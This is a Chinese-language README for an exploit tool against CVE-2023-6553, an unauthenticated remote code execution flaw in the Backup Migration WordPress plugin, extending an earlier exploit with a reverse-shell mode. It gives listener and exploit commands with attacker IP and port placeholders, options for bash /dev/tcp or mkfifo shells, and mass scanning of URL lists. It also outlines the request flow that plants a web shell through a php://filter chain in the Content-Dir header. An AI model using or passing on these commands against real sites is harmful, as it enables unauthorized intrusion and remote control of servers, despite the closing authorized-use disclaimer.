
此漏洞利用基于 CVE-2023-6553,是在 Chocapik 原始漏洞利用的基础上构建的,并新增了可直接获取反向 Shell 的功能。
Chocapikk 的 CVE-2023-6553 漏洞利用程序 的增强版本,在原有交互式 Web Shell 基础上新增了一条命令即可建立反向 Shell 的模式。
CVE-2023-6553 — Backup Migration WordPress 插件(版本 ≤ 1.3.7)中的未认证远程代码执行漏洞。
该插件暴露了 backup-heart.php,它会从 Content-Dir HTTP 头中读取 PHP 过滤器链,并在未经身份验证或过滤的情况下将其传递给 include()。这使得未认证的攻击者可以通过注入精心构造的 php://filter 链来执行任意 PHP 代码。
原始漏洞利用程序由 Chocapikk 编写 — 所有核心利用逻辑(过滤器链生成、文件写入、交互式 Shell)均出自其手。本仓库仅在此基础上增加了反向 Shell 触发模式。
| 功能 | 原版(Chocapikk) | 本版本 |
|---|---|---|
| 交互式 Web Shell | ✅ | ✅(未改动) |
| 反向 Shell | ❌ | ✅(-r) |
| 多 URL 扫描 | ✅ | ✅(未改动) |
| 新增参数 | — | -r、-l、-p、--shell |
唯一的增量为:
trigger_reverse_shell() 方法 — 在 Web Shell 部署完成后(与原版流程相同),发送单个 GET 请求,将反向 Shell 命令作为 0 参数传入,与交互式 Shell 完全一致。main() 中的 5 行代码 — 当存在 -r 参数时,将 interactive_shell() 替换为 trigger_reverse_shell()。其余所有内容 — 漏洞检查、文件写入循环、复制/删除、交互模式、多 URL 扫描 — 均与原版保持一致,未做任何改动。
pip install requests rich alive-progress prompt-toolkit php-filter-chain
# 先启动你的监听器
rlwrap nc -lvnp 4444
# 运行漏洞利用程序
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444
如果目标上无法使用 bash /dev/tcp,请改用 mkfifo(依赖 nc):
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo
python3 exploit.py -u http://TARGET/blog
python3 exploit.py -u http://TARGET/blog -c
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt
-u / --url 目标基础 URL(例如 http://target/blog)
-r / --revshell 启用反向 Shell 模式
-l / --lhost 用于接收 Shell 的你的 IP(与 -r 配合使用)
-p / --lport 你的监听端口(默认:4444)
--shell Shell 类型:bash(默认)或 mkfifo
-c / --check 仅检查漏洞,不部署 Shell
-f / --file 包含待扫描 URL 列表的文件
-t / --threads 多 URL 扫描的线程数(默认:5)
-o / --output 扫描结果输出文件
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
Content-Dir: php://filter/...<编码后的 PHP>
→ 将 Web Shell 逐字符写入临时文件
→ 将临时文件复制为 <random>.php
2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
→ 通过反引号运算符执行命令
→ 交互模式:循环从 stdin 读取命令
→ 反向 Shell 模式:发送 bash/mkfifo 单行命令,连接监听器
3. 清理:unlink(<random>.php)
本工具仅用于授权的渗透测试和安全研究。请勿将其用于未经明确许可的系统。